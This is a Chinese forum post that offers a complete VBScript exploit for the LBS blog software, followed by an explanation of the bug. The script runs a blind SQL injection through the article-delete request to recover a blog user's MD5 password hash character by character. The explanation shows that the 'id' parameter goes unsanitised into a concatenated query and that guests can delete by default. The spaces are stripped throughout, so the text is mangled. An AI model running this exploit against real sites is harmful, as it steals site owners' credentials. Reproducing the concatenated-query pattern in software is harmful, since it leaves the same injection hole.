呵呵,只是证明下漏洞存在
exp如下,保存为vbs,自己下个程序测试自己吧
'From剑心
'============================================================================
'使用说明:
'在命令提示符下:
'cscript.exelbsblog.vbs要攻击的网站的博客路径有效的文章id要破解的博客用户密码
'如:
'cscript.exelbsblog.vbswww.xxxx.com/blog/11
'byloveshell
'============================================================================
OnErrorResumeNext
DimoArgs
DimolbsXML'XMLHTTP对象用来打开目标网址
DimTargetURL'目标网址
Dimuserid,articleid'博客用户名
DimTempStr'存放已获取的部分MD5密码
DimCharHex'定义16进制字符
Dimcharset
SetoArgs=WScript.arguments
IfoArgs.count<1ThenCallShowUsage()
SetolbsXML=createObject("Microsoft.XMLHTTP")
'补充完整目标网址
TargetURL=oArgs(0)
IfLCase(Left(TargetURL,7))<>"http://"ThenTargetURL="http://"&TargetURL
Ifright(TargetURL,1)<>"/"ThenTargetURL=TargetURL&"/"
TargetURL=TargetURL&"article.asp"
articleid=oArgs(1)
userid=oArgs(2)
TempStr=""
CharHex=Split("0,1,2,3,4,5,6,7,8,9,a,b,c,d,e,f",",")
WScript.echo"LBSblogAllversionExploit"&vbcrlf
WScript.echo"By剑心"&vbcrlf
WScript.echo"http://www.loveshell.net/JustForfun:)"&vbcrlf&vbcrlf
WScript.echo"+Fuckthesitenow"&vbcrlf
Callmain(TargetURL,BlogName)
SetoBokeXML=Nothing
'----------------------------------------------sub-------------------------------------------------------
'============================================
'函数名称:main
'函数功能:主程序,注入获得blog用户密码
'============================================
Submain(TargetURL,BlogName)
DimMainOffset,SubOffset,TempLen,OpenURL,GetPage
ForMainOffset=1To40
ForSubOffset=0To15
TempLen=0
postdata=""
postdata=articleid&"and(selectleft(user_password,"&MainOffset&")fromblog_userwhereuser_id="&userid&")='"&TempStr&CharHex(SubOffset)&"'"
OpenURL=TargetURL
olbsXML.open"Post",OpenURL,False,"",""
olbsXML.setRequestHeader"Content-Type","application/x-www-form-urlencoded"
olbsXML.send"act=delete&id="&escape(postdata)
GetPage=BytesToBstr(olbsXML.ResponseBody)
'判断访问的页面是否存在
IfInStr(GetPage,"deleted")<>0Then
'"博客用户不存在或填写的资料有误"为错误标志,返回此标志说明猜解的MD5不正确
'如果得到0000000000000000的MD5值,请修改错误标志
ElseIfInStr(GetPage,"permission")<>0Then
TempStr=TempStr&CharHex(SubOffset)
WScript.Echo"+Cracknow:"&TempStr
Exitfor
Else
WScript.echovbcrlf&"Somethingerror"&vbcrlf
WScript.echovbcrlf&GetPage&vbcrlf
WScript.Quit
EndIf
next
Next
WScript.Echovbcrlf&"+WeGotIt:"&TempStr&vbcrlf&vbcrlf&":PDon'tBeevil"
Endsub
'============================================
'函数名称:BytesToBstr
'函数功能:将XMLHTTP对象中的内容转化为GB2312编码
'============================================
FunctionBytesToBstr(body)
dimobjstream
setobjstream=createObject("ADODB.Stream")
objstream.Type=1
objstream.Mode=3
objstream.Open
objstream.Writebody
objstream.Position=0
objstream.Type=2
objstream.Charset="GB2312"
BytesToBstr=objstream.ReadText
objstream.Close
setobjstream=nothing
EndFunction
'============================
'函数名称:ShowUsage
'函数功能:使用方法提示
'============================
SubShowUsage()
WScript.echo"LBSblogExploit"&vbcrlf&"ByLoveshell/剑心"
WScript.echo"Usage:"&vbcrlf&"CScript"&WScript.ScriptFullName&"TargetURLBlogName"
WScript.echo"Example:"&vbcrlf&"CScript"&WScript.ScriptFullName&"http://www.loveshell.net/11"
WScript.echo""
WScript.Quit
EndSub
漏洞说明:
src_article.asp中的
......
input["log_id"]=func.checkInt(input["log_id"]);
if(!input["id"]){
strError=lang["invalid_parameter"];
}else{
//Checkifthearticleexists
theArticle.load("log_id,log_authorID,log_catID","log_id="+input["id"]);
strError=false;
}
......
过滤的是log_id,但是使用的确实id,呵呵:)
然后呢?
class/article.asp中的代码
this.load=function(strselect,strwhere){
vartmpA=connBlog.query("selectTOP1"+strselect+"FROM[blog_Article]where"+strwhere);
if(tmpA){
this.fill(tmpA[0]);
returntrue;
}else{
returnfalse;
}
}
上面不用说了吧,呵呵.不过触发要条件的,看能满足不哦!
functionarticledelete(){
if(theUser.rights["delete"]<1){
//CheckUserRight-withoutDBQuery
pageHeader(lang["error"]);
redirectMessage(lang["error"],lang["no_rights"],lang["goback"],"javascript:window.history.back();",false,"errorbox");
}else{
vartheArticle=newlbsArticle();
varstrError;
默认情况下guest都有删除权限的,尽管后面还做了判断,但是注入已经发生,而我们正好利用他的判断注射,呵呵